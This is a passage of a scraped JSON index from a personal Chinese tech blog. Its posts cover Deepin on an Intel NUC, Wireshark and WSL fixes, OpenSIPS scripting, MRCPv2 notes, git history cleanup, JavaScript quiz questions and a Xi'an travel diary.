","permalink":"https://wdd.js.org/posts/2022/12/nuc11-deepin-20-2/","summary":"硬件 内存:金士顿 16*2;869元 固态硬盘: 三星980 1TB; 799元 主机:NUC11 PAHI7; 4核心八线程;3399元 累计5000多一点, 是最新版Macbook pro M1prod的三分之一\n启动盘制作 ventoy:试了几次,无法开机,遂放弃 rufus:能够正常使用;注意分区类型要选择GPT。最新款的一些电脑都是支持uefi的,所以选择GPT分区,一定没问题。\nU盘启动 开机后按F2, 里面有一个是设置BIOS优先级,可以设置优先U盘启动\n磁盘分区 因为之前设置了默认的整个磁盘分区,根目录只有15G, 太小了,所以我选择手动分区 先设置一个efi分区,就用默认的300M就可以,默认弹窗出来,是不需要设置挂在目录的 设置根分区 /, 我分了300G 设置/home分区,剩下的磁盘都分给他 我没有设置swap分区,因为我觉得32G内存够大,不需要swap\n其他 后续的配置非常简单,基本点点按钮就能搞定\n体验 总体来说,安装软件是最舒服的一件事。不需要像安装manjaro那样,到处找安装常用应用的教程。只需要打开应用商店,点击下载就可以了。 整个安装过程,我觉得磁盘分区是最难的部分。其他都是非常方便的。 感觉深度的界面很漂亮,值得体验\n问题 NUC自带的麦克风无法外放声音,插有线耳机也不行,只有蓝牙耳机能用 ","title":"NUC11 安装 Deepin 20.2.4"},{"content":"0. 前提条件 wireshark 4.0.2 1. 时间显示 wireshark的默认时间显示是抓包的相对时间, 如果我们时间按照年月日时分秒显示,就需要进行如下设置:\n视图-\u0026gt;时间显示格式-\u0026gt;选择具体的时间格式\n2. UDP解码为RTP 方案1 在一个包UDP包上点击右键,出现如下弹框,选择Decode As\n再当前值上选择RTP 方案2 方案1有一个缺点,只能过滤单一端口的UDP包,将其解码为RTP。\n假如有很多的UDP包,并且端口都不一样,如果想把这些包都解码为RTP, 则需要如下设置。\n选择分析-\u0026gt;启用的协议\n在搜索框中输入RTP, 然后启用RTP的rtp_udp\n","permalink":"https://wdd.js.org/posts/2022/12/wireshark-101/","summary":"0. 前提条件 wireshark 4.0.2 1. 时间显示 wireshark的默认时间显示是抓包的相对时间, 如果我们时间按照年月日时分秒显示,就需要进行如下设置:\n视图-\u0026gt;时间显示格式-\u0026gt;选择具体的时间格式\n2. UDP解码为RTP 方案1 在一个包UDP包上点击右键,出现如下弹框,选择Decode As\n再当前值上选择RTP 方案2 方案1有一个缺点,只能过滤单一端口的UDP包,将其解码为RTP。\n假如有很多的UDP包,并且端口都不一样,如果想把这些包都解码为RTP, 则需要如下设置。\n选择分析-\u0026gt;启用的协议\n在搜索框中输入RTP, 然后启用RTP的rtp_udp","title":"Wireshark 使用技巧"},{"content":"最近我更新了Windows, 之后我的Windows Linux子系统Ubuntu打开就报错了\n报错截图如下:\n在网上搜了一边之后,很多教程都是说要打开Windows的子系统的功能。 但是由于我已经使用Linux子系统已经很长时间了,我觉得应该和这个设置无关。\n而且我检查了一下,我的这个设置本来就是打开的。\n然后我在Powershell里输入 wsl, 这个命令都直接报错了。\nPS C:\\WINDOWS\\system32\u0026gt; wsl --install 没有注册类 Error code: Wsl/0x80040154 然后我到wsl的github上搜索类似的问题,查到有很多类似的描述,都是升级之后遇到的问题,我试了好几个方式,都没用。\n但是最后这个有用了!\nhttps://github.com/microsoft/WSL/issues/9064\n解决的方案就是:\n卸载已经安装过的Windows SubSystem For Linux Preview 然后再Windows应用商店重新安装这个应用 Windows的升级之后,可能Windows Linux子系统组建也更新了某些了内容。\n所以需要重装。\n这里不得不吐槽一下WSL, 这个工具仅仅是个玩具。随着windows更新,这个工具随时都会崩溃,最好不要太依赖它。\n","permalink":"https://wdd.js.org/posts/2022/12/wsl-error-0x80040154-after-windows-update/","summary":"最近我更新了Windows, 之后我的Windows Linux子系统Ubuntu打开就报错了\n报错截图如下:\n在网上搜了一边之后,很多教程都是说要打开Windows的子系统的功能。 但是由于我已经使用Linux子系统已经很长时间了,我觉得应该和这个设置无关。\n而且我检查了一下,我的这个设置本来就是打开的。\n然后我在Powershell里输入 wsl, 这个命令都直接报错了。\nPS C:\\WINDOWS\\system32\u0026gt; wsl --install 没有注册类 Error code: Wsl/0x80040154 然后我到wsl的github上搜索类似的问题,查到有很多类似的描述,都是升级之后遇到的问题,我试了好几个方式,都没用。\n但是最后这个有用了!\nhttps://github.com/microsoft/WSL/issues/9064\n解决的方案就是:\n卸载已经安装过的Windows SubSystem For Linux Preview 然后再Windows应用商店重新安装这个应用 Windows的升级之后,可能Windows Linux子系统组建也更新了某些了内容。\n所以需要重装。\n这里不得不吐槽一下WSL, 这个工具仅仅是个玩具。随着windows更新,这个工具随时都会崩溃,最好不要太依赖它。","title":"Windows更新之后 Linux报错 Error 0x80040154"},{"content":"在设置里搜索双击,如果有使用双击关闭浏览器选项卡, 则开启。\n对于用鼠标关闭标签页来说,的确可以提高极大的效率。\n","permalink":"https://wdd.js.org/posts/2022/12/double-click-close-tab/","summary":"在设置里搜索双击,如果有使用双击关闭浏览器选项卡, 则开启。\n对于用鼠标关闭标签页来说,的确可以提高极大的效率。","title":"Edge浏览器双击标签栏 关闭标签页"},{"content":"我在2019年的六月份时候,开始使用语雀。\n一路走来,我见证了语雀的功能越来越多,但是于此同时,我也越来越讨厌语雀。\n2022年12月初,我基本上把语雀上的所有内容都迁移到我的hugo博客上。\n我的博客很乱,也很多。我写了一个脚本,一个一个知识库的搬迁,总体速度还算快,唯一不便的就是图片需要一个一个复制粘贴。\n有些图片是用语雀的绘图语言例如plantuml编写的,就只能截图保存了。\n总之,我也是蛮累的。\n简单列一下我不喜欢语雀的几个原因:\n性能差,首页渲染慢,常常要等很久,首页才能打开 产品定位混乱,随意更改用户数据 我记得有时候我把知识库升级成了空间,过了一段时间,不知道为什么空间由变成了知识库。 数字花园这个概念真的很烂。我好好的个人主页,某一天打开,大变样,换了个名字,叫做数字花园。甚至没有给用户一个选择保留老版本的个人主页的权利。太不尊重用户了!! 就好像你下班回家,看见房门被人撬开,你打开房门,看见有人在你的客厅种满大蒜,然后还兴高采烈的告诉你,看,这是您的数字菜园!多好,以后不用买蒜了。 会员的流量计费规则, 或许现在的计费规则已经变了,我也没有再充会员,但是再以前。即使是会员,也是按流量计费的。什么叫按流量计费,假如你的一篇博客里上传了一张1mb的图片,即使你后来把这个图片删了,这1mb的流量还是会存在。而且流量是一直往上涨的,还不像运营商,每月一号给你清零一次的机会。 ","permalink":"https://wdd.js.org/posts/2022/12/why-i-dont-not-use-yuque-any-more/","summary":"我在2019年的六月份时候,开始使用语雀。\n一路走来,我见证了语雀的功能越来越多,但是于此同时,我也越来越讨厌语雀。\n2022年12月初,我基本上把语雀上的所有内容都迁移到我的hugo博客上。\n我的博客很乱,也很多。我写了一个脚本,一个一个知识库的搬迁,总体速度还算快,唯一不便的就是图片需要一个一个复制粘贴。\n有些图片是用语雀的绘图语言例如plantuml编写的,就只能截图保存了。\n总之,我也是蛮累的。\n简单列一下我不喜欢语雀的几个原因:\n性能差,首页渲染慢,常常要等很久,首页才能打开 产品定位混乱,随意更改用户数据 我记得有时候我把知识库升级成了空间,过了一段时间,不知道为什么空间由变成了知识库。 数字花园这个概念真的很烂。我好好的个人主页,某一天打开,大变样,换了个名字,叫做数字花园。甚至没有给用户一个选择保留老版本的个人主页的权利。太不尊重用户了!! 就好像你下班回家,看见房门被人撬开,你打开房门,看见有人在你的客厅种满大蒜,然后还兴高采烈的告诉你,看,这是您的数字菜园!多好,以后不用买蒜了。 会员的流量计费规则, 或许现在的计费规则已经变了,我也没有再充会员,但是再以前。即使是会员,也是按流量计费的。什么叫按流量计费,假如你的一篇博客里上传了一张1mb的图片,即使你后来把这个图片删了,这1mb的流量还是会存在。而且流量是一直往上涨的,还不像运营商,每月一号给你清零一次的机会。 ","title":"为什么我不再使用语雀"},{"content":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","permalink":"https://wdd.js.org/opensips/3x/module-args/","summary":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","title":"模块传参的重构"},{"content":" TelNYX.pdf OpenSIPS 2.3 mediasoup Cutting Edge WebRTC Video COnferencing FreeSWITCH-driven routing in OpenSIPS Voicenter: Contact center on Steroids Vlad_Paiu-Distributed_OpenSIPS_Systems_Cluecon14.pdf Vlad_Paiu-OpenSIPS_Summit_Austin_2015-Async.pdf Ionut_Ionita-OpenSIPS_Summit2017-Capturing_beyond_SIP FLAVIO_GONCALVES-Fraud_in_VoIP_Today.pdf Alexandr_Dubovikov-OpenSIPS_Summit2017-RTC_Threat_Intelligence_Exchange.pdf OpenSIPS_LoadBalancing.pdf Vlad_Paiu-OpenSIPS_Summit_2104-OpenSIPS_End_User_Services.pdf Razvan_Crainea-OpenSIPS_Summit2017-From_SIPI_Trunks_to_End_Users.pdf Razvan_Crainea-OpenSIPS_Summit-Scaling_Asterisk.pdf Vlad_Paiu-OpenSIPS_Summit-Service_Enabling_for_Asterisk.pdf Jonas_Borjesson-OpenSIPS_Summit_Austin_2015.pdf Michele_Pinasi-OpenSIPS_Summit2017-How_we_did_VoIP.pdf Bogdan_Iancu-OpenSIPS_Summit_Keynotes.pdf Giovanni_Maruzselli-OpenSIPS_Summit2017-Scaling_FreeSWITCHes.pdf Maksym_Sobolyev-OpenSIPS_Summit2017-Sippy_Labs_update.pdf docker-cluster.pdf voip malware attack tool .pdf Bogdan_Iancu-OpenSIPS_Summit-OpenSIPS_2_1.pdf Pete_Kelly-OpenSIPS_Workshop_Chicago_2015-Calling_Cards_B2BUA.pdf Bogdan_Iancu-OpenSIPS_Summit-keynotes.pdf Alex_Goulis-Opensips_CNAME.pdf OpenSIPS_2.0_Framework.pdf Norman_Brandinger-OpenSIPS_Summit_2014-Advanced_SIP_Routing_with_OpenSIPS_modules.pdf ","permalink":"https://wdd.js.org/opensips/pdf/","summary":" TelNYX.pdf OpenSIPS 2.3 mediasoup Cutting Edge WebRTC Video COnferencing FreeSWITCH-driven routing in OpenSIPS Voicenter: Contact center on Steroids Vlad_Paiu-Distributed_OpenSIPS_Systems_Cluecon14.pdf Vlad_Paiu-OpenSIPS_Summit_Austin_2015-Async.pdf Ionut_Ionita-OpenSIPS_Summit2017-Capturing_beyond_SIP FLAVIO_GONCALVES-Fraud_in_VoIP_Today.pdf Alexandr_Dubovikov-OpenSIPS_Summit2017-RTC_Threat_Intelligence_Exchange.pdf OpenSIPS_LoadBalancing.pdf Vlad_Paiu-OpenSIPS_Summit_2104-OpenSIPS_End_User_Services.pdf Razvan_Crainea-OpenSIPS_Summit2017-From_SIPI_Trunks_to_End_Users.pdf Razvan_Crainea-OpenSIPS_Summit-Scaling_Asterisk.pdf Vlad_Paiu-OpenSIPS_Summit-Service_Enabling_for_Asterisk.pdf Jonas_Borjesson-OpenSIPS_Summit_Austin_2015.pdf Michele_Pinasi-OpenSIPS_Summit2017-How_we_did_VoIP.pdf Bogdan_Iancu-OpenSIPS_Summit_Keynotes.pdf Giovanni_Maruzselli-OpenSIPS_Summit2017-Scaling_FreeSWITCHes.pdf Maksym_Sobolyev-OpenSIPS_Summit2017-Sippy_Labs_update.pdf docker-cluster.pdf voip malware attack tool .pdf Bogdan_Iancu-OpenSIPS_Summit-OpenSIPS_2_1.pdf Pete_Kelly-OpenSIPS_Workshop_Chicago_2015-Calling_Cards_B2BUA.pdf Bogdan_Iancu-OpenSIPS_Summit-keynotes.pdf Alex_Goulis-Opensips_CNAME.pdf OpenSIPS_2.0_Framework.pdf Norman_Brandinger-OpenSIPS_Summit_2014-Advanced_SIP_Routing_with_OpenSIPS_modules.pdf ","title":"Pdf学习资料"},{"content":"一年过半以后,偶然打开微信公众号,看到草稿箱里的篇文章。我才回想起去年带女友去西安的那个遥远的夏天。\n如今女友已经变成老婆,这篇文章我才想起来发表。\nday 1 钟楼 鼓楼 回民街 那是六月末的时候,和女友一起坐火车去了趟西安。\n为什么要去西安呢?据吃货女友说,西安有非常多的好吃的。所以人生是必须要去一趟的。\n清晨,我们从南京南站出发坐动车,一路向西,坐了5个多小时,到达西安北站。\n路上我带了一个1500ml的水瓶,以及1500ml的酸奶。\n女友吐槽说,还好没做飞机,不然我就像宝强一样,要在机场干完一大瓶酸奶了。\n下了动车,立即前往钟楼订的宾馆,放置行李。\n西安钟楼位于西安市中心,是中国现存钟楼中形制最大、保存最完整的一座。建于明太祖洪武十七年,初建于今广济街口,与鼓楼相对,明神宗万历十年整体迁移于今址。\n沿着钟楼附近,我们逛了一圈回民街。\n回民街是西安著名的美食文化街区,是西安小吃街区。\n西安回民街作为西安风情的代表之一,是回民街区多条街道的统称,由北广济街、北院门、西羊市、大皮院、化觉巷、洒金桥等数条街道组成,在钟鼓楼后。\n钟楼\nday 2 大唐芙蓉城 大唐不夜城 大雁塔 大唐芙蓉城是一座仿唐建筑,里面有许多景点,或许我们不应该早上来,因为上午太热了。\n唯一庆幸的是,我们带了一个很大的水杯,而且芙蓉城里提供免费的开水,所以我们才没有被渴死。\n大唐芙蓉城 西游师徒四人 雕塑\n傍晚的 大唐不夜城\n夜幕降临的 大唐不夜城\n遗憾之一:大雁塔没有去看,因为当时正在维修,周围全是脚手架。 遗憾之二:没有到陕西历史博物馆看看,因为没有早点预约\n女友埋怨我说我不早点做攻略,害得这么多景点去不了。\n我说我是做了攻略的,还记在备忘录里面呢。\n女友打开我的备忘录一看,笑出眼泪说:你做的啥狗屁攻略,就这几个字!男人果然靠不住!\n我说: 这你就不懂了吧,啥都写清楚,一个一个点打卡多没意思。\nday3 华清宫 兵马俑 长恨歌 由于西安攻略做的太过肤浅,所以第二天晚上决定直接跟团。在网上买了两张华清宫兵马俑和长恨歌的一日游。\n说实在的,华清宫没啥意思,都是洗澡池子。\n蒋介石洗过澡的池子,杨贵妃的洗澡池子,唐明皇的洗澡池子,大臣们的洗澡池子。\n逛完之后,下午我们坐着旅游大巴,前往兵马俑。\n一号坑\n一号坑\n一号坑\n一号坑\n一号坑\n兵马俑有三个坑。\n一号坑最大,兵马俑也是最多的。然而当时游客比肩接踵,加上天气炎热,大家都在里面像蒸桑拿一样。\n出了一号坑,我心里想:这么大个坑,这么热为啥不装空调,难道是因为要保护文物吗?\n后来据博物馆的讲解员介绍:不装空调是因为审核手续复杂,可能要要个几十年手续才能完成。像二号坑和三号坑都已经装好空调了。\n二号坑真的是个坑,没有兵马俑,仅仅是个大坑。\n三号坑比较小,仅有几个陶俑。\n长恨歌实际上是一个大型的室外表演,由白居易的《长恨歌》演绎而来,讲述唐明皇和杨贵妃的爱恨情长。灯光绚丽,舞蹈优美,感人至深。\n关于西安美食就很多了\n毛笔酥\n六大碗\n毛笔酥 酸梅汤\n","permalink":"https://wdd.js.org/posts/2022/12/xian-travel/","summary":"一年过半以后,偶然打开微信公众号,看到草稿箱里的篇文章。我才回想起去年带女友去西安的那个遥远的夏天。\n如今女友已经变成老婆,这篇文章我才想起来发表。\nday 1 钟楼 鼓楼 回民街 那是六月末的时候,和女友一起坐火车去了趟西安。\n为什么要去西安呢?据吃货女友说,西安有非常多的好吃的。所以人生是必须要去一趟的。\n清晨,我们从南京南站出发坐动车,一路向西,坐了5个多小时,到达西安北站。\n路上我带了一个1500ml的水瓶,以及1500ml的酸奶。\n女友吐槽说,还好没做飞机,不然我就像宝强一样,要在机场干完一大瓶酸奶了。\n下了动车,立即前往钟楼订的宾馆,放置行李。\n西安钟楼位于西安市中心,是中国现存钟楼中形制最大、保存最完整的一座。建于明太祖洪武十七年,初建于今广济街口,与鼓楼相对,明神宗万历十年整体迁移于今址。\n沿着钟楼附近,我们逛了一圈回民街。\n回民街是西安著名的美食文化街区,是西安小吃街区。\n西安回民街作为西安风情的代表之一,是回民街区多条街道的统称,由北广济街、北院门、西羊市、大皮院、化觉巷、洒金桥等数条街道组成,在钟鼓楼后。\n钟楼\nday 2 大唐芙蓉城 大唐不夜城 大雁塔 大唐芙蓉城是一座仿唐建筑,里面有许多景点,或许我们不应该早上来,因为上午太热了。\n唯一庆幸的是,我们带了一个很大的水杯,而且芙蓉城里提供免费的开水,所以我们才没有被渴死。\n大唐芙蓉城 西游师徒四人 雕塑\n傍晚的 大唐不夜城\n夜幕降临的 大唐不夜城\n遗憾之一:大雁塔没有去看,因为当时正在维修,周围全是脚手架。 遗憾之二:没有到陕西历史博物馆看看,因为没有早点预约\n女友埋怨我说我不早点做攻略,害得这么多景点去不了。\n我说我是做了攻略的,还记在备忘录里面呢。\n女友打开我的备忘录一看,笑出眼泪说:你做的啥狗屁攻略,就这几个字!男人果然靠不住!\n我说: 这你就不懂了吧,啥都写清楚,一个一个点打卡多没意思。\nday3 华清宫 兵马俑 长恨歌 由于西安攻略做的太过肤浅,所以第二天晚上决定直接跟团。在网上买了两张华清宫兵马俑和长恨歌的一日游。\n说实在的,华清宫没啥意思,都是洗澡池子。\n蒋介石洗过澡的池子,杨贵妃的洗澡池子,唐明皇的洗澡池子,大臣们的洗澡池子。\n逛完之后,下午我们坐着旅游大巴,前往兵马俑。\n一号坑\n一号坑\n一号坑\n一号坑\n一号坑\n兵马俑有三个坑。\n一号坑最大,兵马俑也是最多的。然而当时游客比肩接踵,加上天气炎热,大家都在里面像蒸桑拿一样。\n出了一号坑,我心里想:这么大个坑,这么热为啥不装空调,难道是因为要保护文物吗?\n后来据博物馆的讲解员介绍:不装空调是因为审核手续复杂,可能要要个几十年手续才能完成。像二号坑和三号坑都已经装好空调了。\n二号坑真的是个坑,没有兵马俑,仅仅是个大坑。\n三号坑比较小,仅有几个陶俑。\n长恨歌实际上是一个大型的室外表演,由白居易的《长恨歌》演绎而来,讲述唐明皇和杨贵妃的爱恨情长。灯光绚丽,舞蹈优美,感人至深。\n关于西安美食就很多了\n毛笔酥\n六大碗\n毛笔酥 酸梅汤","title":"西安之旅 不仅有羊肉泡馍 也有长恨歌"},{"content":"简介 MRCPv2 是Media Resource Control Protocol Version 2的缩写 MRCP 允许客户端去操作服务端的媒体资源处理 MRCP 的常见功能如下 文本转语音 语音识别 说话人识别 语音认证 等等 MRCP 并不是一个独立的协议,而是依赖于其他的协议,如 SIP/SDP MRCPv2 RFC 发表于 2012 年 MRCPv2 主要由思科,Nuance,Speechworks 开发 MRCPv2 是基于 MRCPv1 开发的 MRCPv2 不兼容 MRCPv1 MRCPv2 在传输层使用 TCP 或者 TLS 定义 媒体资源: An entity on the speech processing server that can be controlled through MRCPv2. MRCP 服务器: Aggregate of one or more \u0026ldquo;Media Resource\u0026rdquo; entities on a server, exposed through MRCPv2. Often, \u0026lsquo;server\u0026rsquo; in this document refers to an MRCP server. MRCP 客户端: An entity controlling one or more Media Resources through MRCPv2 (\u0026ldquo;Client\u0026rdquo; for short). DTMF: Dual-Tone Multi-Frequency; a method of transmitting key presses in-band, either as actual tones (Q.23 [Q.23]) or as named tone events (RFC 4733 [RFC4733]). Endpointing: The process of automatically detecting the beginning and end of speech in an audio stream. This is critical both for speech recognition and for automated recording as one would find in voice mail systems. Hotword Mode: A mode of speech recognition where a stream of utterances is evaluated for match against a small set of command words. This is generally employed either to trigger some action or to control the subsequent grammar to be used for further recognition. 架构 客户端使用SIP/SDP建立MRCP控制通道 SIP使用SDP的offer/answer模型来描述MRCP通道的参数 服务端在answer SDP中提供唯一的通道ID和服务端TCP端口号 客户端可以开启一个新的TCP链接,多个MRCP通道也可以共享一个TCP链接 管理资源控制通道 This \u0026ldquo;m=\u0026rdquo; line MUST have a media type field of \u0026ldquo;application\u0026rdquo; transport type field of either \u0026ldquo;TCP/MRCPv2\u0026rdquo; or \u0026ldquo;TCP/TLS/MRCPv2\u0026rdquo; The port number field of the \u0026ldquo;m=\u0026rdquo; line MUST contain the \u0026ldquo;discard\u0026rdquo; port of the transport protocol (port 9 for TCP) in the SDP offer from the client MUST contain the TCP listen port on the server in the SDP answer MRCPv2 servers MUST NOT assume any relationship between resources using the same port other than the sharing of the communication channel. To remain backwards compatible with conventional SDP usage, the format field of the \u0026ldquo;m=\u0026rdquo; line MUST have the arbitrarily selected value of \u0026ldquo;1\u0026rdquo;. The a=connection attribute MUST have a value of \u0026ldquo;new\u0026rdquo; on the very first control \u0026ldquo;m=\u0026rdquo; line offer from the client to an MRCPv2 server Subsequent control \u0026ldquo;m=\u0026rdquo; line offers from the client to the MRCP server MAY contain \u0026ldquo;new\u0026rdquo; or \u0026ldquo;existing\u0026rdquo;, depending on whether the client wants to set up a new connection or share an existing connection When the client wants to deallocate the resource from this session, it issues a new SDP offer, according to RFC 3264 [RFC3264], where the control \u0026ldquo;m=\u0026rdquo; line port MUST be set to 0 When the client wants to tear down the whole session and all its resources, it MUST issue a SIP BYE request to close the SIP session. This will deallocate all the control channels and resources allocated under the session. MRCPv2 Session Termination If an MRCP client notices that the underlying connection has been closed for one of its MRCP channels, and it has not previously initiated a re-INVITE to close that channel, it MUST send a BYE to close down the SIP dialog and all other MRCP channels. If an MRCP server notices that the underlying connection has been closed for one of its MRCP channels, and it has not previously received and accepted a re-INVITE closing that channel, then it MUST send a BYE to close down the SIP dialog and all other MRCP channels.\nMRCP request request-line = mrcp-version SP message-length SP method-name SP request-id CRLF request-id = 1*10DIGIT MRCP response response-line = mrcp-version SP message-length SP request-id SP status-code SP request-state CRLF status-code = 3DIGIT request-state = \u0026ldquo;COMPLETE\u0026rdquo; / \u0026ldquo;IN-PROGRESS\u0026rdquo; / \u0026ldquo;PENDING\u0026rdquo; event event-line = mrcp-version SP message-length SP event-name SP request-id SP request-state CRLF event-name = synthesizer-event / recognizer-event / recorder-event / verifier-event 参考 https://www.rfc-editor.org/rfc/rfc6787 ","permalink":"https://wdd.js.org/posts/2022/12/mrcp-notes/","summary":"简介 MRCPv2 是Media Resource Control Protocol Version 2的缩写 MRCP 允许客户端去操作服务端的媒体资源处理 MRCP 的常见功能如下 文本转语音 语音识别 说话人识别 语音认证 等等 MRCP 并不是一个独立的协议,而是依赖于其他的协议,如 SIP/SDP MRCPv2 RFC 发表于 2012 年 MRCPv2 主要由思科,Nuance,Speechworks 开发 MRCPv2 是基于 MRCPv1 开发的 MRCPv2 不兼容 MRCPv1 MRCPv2 在传输层使用 TCP 或者 TLS 定义 媒体资源: An entity on the speech processing server that can be controlled through MRCPv2. MRCP 服务器: Aggregate of one or more \u0026ldquo;Media Resource\u0026rdquo; entities on a server, exposed through MRCPv2.","title":"MRCPv2 协议学习"},{"content":"有些时候,git 仓库累积了太多无用的历史更改,导致 clone 文件过大。如果确定历史更改没有意义,可以采用下述方法清空历史,\n先 clone 项目到本地目录 (以名为 mylearning 的仓库为例) git clone git@gitee.com:badboycoming/mylearning.git 进入 mylearning 仓库,拉一个分支,比如名为 latest_branch git checkout --orphan latest_branch 添加所有文件到上述分支 (Optional) git add -A 提交一次 git commit -am \u0026#34;Initial commit.\u0026#34; 删除 master 分支 git branch -D master 更改当前分支为 master 分支 git branch -m master 将本地所有更改 push 到远程仓库 git push -f origin master 关联本地 master 到远程 master git branch --set-upstream-to=origin/master ","permalink":"https://wdd.js.org/git/clean-all-history/","summary":"有些时候,git 仓库累积了太多无用的历史更改,导致 clone 文件过大。如果确定历史更改没有意义,可以采用下述方法清空历史,\n先 clone 项目到本地目录 (以名为 mylearning 的仓库为例) git clone git@gitee.com:badboycoming/mylearning.git 进入 mylearning 仓库,拉一个分支,比如名为 latest_branch git checkout --orphan latest_branch 添加所有文件到上述分支 (Optional) git add -A 提交一次 git commit -am \u0026#34;Initial commit.\u0026#34; 删除 master 分支 git branch -D master 更改当前分支为 master 分支 git branch -m master 将本地所有更改 push 到远程仓库 git push -f origin master 关联本地 master 到远程 master git branch --set-upstream-to=origin/master ","title":"清除所有GIT历史记录"},{"content":"git remote set-url origin repo-url ","permalink":"https://wdd.js.org/git/remote-url/","summary":"git remote set-url origin repo-url ","title":"GIT 重新设置远程url"},{"content":"1. 分析输出 for (var i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } for (let i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } 2. 分析输出 const shape = { radius: 10, diameter() { return this.radius * 2 }, perimeter: () =\u0026gt; 2 * Math.PI * this.radius, } shape.diameter() shape.perimeter() 3. 分析输出 const a = {} function test1(a) { a = { name: \u0026#39;wdd\u0026#39;, } } function test2() { test1(a) } function test3() { console.log(a) } test2() test3() 4. 分析输出 class Chameleon { static colorChange(newColor) { this.newColor = newColor return this.newColor } constructor({ newColor = \u0026#39;green\u0026#39; } = {}) { this.newColor = newColor } } const freddie = new Chameleon({ newColor: \u0026#39;purple\u0026#39; }) freddie.colorChange(\u0026#39;orange\u0026#39;) 5. 分析输出 function Person(firstName, lastName) { this.firstName = firstName this.lastName = lastName } const member = new Person(\u0026#39;Lydia\u0026#39;, \u0026#39;Hallie\u0026#39;) Person.getFullName = function () { return `${this.firstName} ${this.lastName}` } console.log(member.getFullName()) 6. 事件传播的三个阶段是什么? A: Target \u0026gt; Capturing \u0026gt; Bubbling B: Bubbling \u0026gt; Target \u0026gt; Capturing C: Target \u0026gt; Bubbling \u0026gt; Capturing D: Capturing \u0026gt; Target \u0026gt; Bubbling 7. 所有对象都有原型 A: 对 B: 错\n8. 输出? function sum(a, b) { return a + b } sum(1, \u0026#39;2\u0026#39;) 9. 输出? function getPersonInfo(one, two, three) { console.log(one) console.log(two) console.log(three) } const person = \u0026#39;Lydia\u0026#39; const age = 21 getPersonInfo`${person} is ${age} years old` 输出? function checkAge(data) { if (data === { age: 18 }) { console.log(\u0026#39;You are an adult!\u0026#39;) } else if (data == { age: 18 }) { console.log(\u0026#39;You are still an adult.\u0026#39;) } else { console.log(`Hmm.. You don\u0026#39;t have an age I guess`) } } checkAge({ age: 18 }) 输出? function getAge(...args) { console.log(typeof args) } getAge(21) ","permalink":"https://wdd.js.org/fe/js-questions/","summary":"1. 分析输出 for (var i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } for (let i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } 2. 分析输出 const shape = { radius: 10, diameter() { return this.radius * 2 }, perimeter: () =\u0026gt; 2 * Math.PI * this.radius, } shape.diameter() shape.perimeter() 3. 分析输出 const a = {} function test1(a) { a = { name: \u0026#39;wdd\u0026#39;, } } function test2() { test1(a) } function test3() { console.","title":"JS 考题"},{"content":"想查资料,发现 deepin 居然没有 man 这个命令。\n安装 sudo apt-get install man-db 使用介绍 ","permalink":"https://wdd.js.org/posts/2022/11/deepin-install-man/","summary":"想查资料,发现 deepin 居然没有 man 这个命令。\n安装 sudo apt-get install man-db 使用介绍 ","title":"Deepin安装man命令"},{"content":"脚本变量 avp 变量 伪变量 SIP 头, $(hrd(name)) $(hdr(name)[N]) - represents the body of the N-th header identified by \u0026rsquo;name\u0026rsquo;. If [N] is omitted then the body of the first header is printed. The first header is got when N=0, for the second N=1, a.s.o. To print the last header of that type, use -1, no other negative values are supported now. No white spaces are allowed inside the specifier (before }, before or after {, [, ] symbols). When N=\u0026rsquo;*\u0026rsquo;, all headers of that type are printed.\nThe module should identify most of compact header names (the ones recognized by OpenSIPS which should be all at this moment), if not, the compact form has to be specified explicitly. It is recommended to use dedicated specifiers for headers (e.g., %ua for user agent header), if they are available \u0026ndash; they are 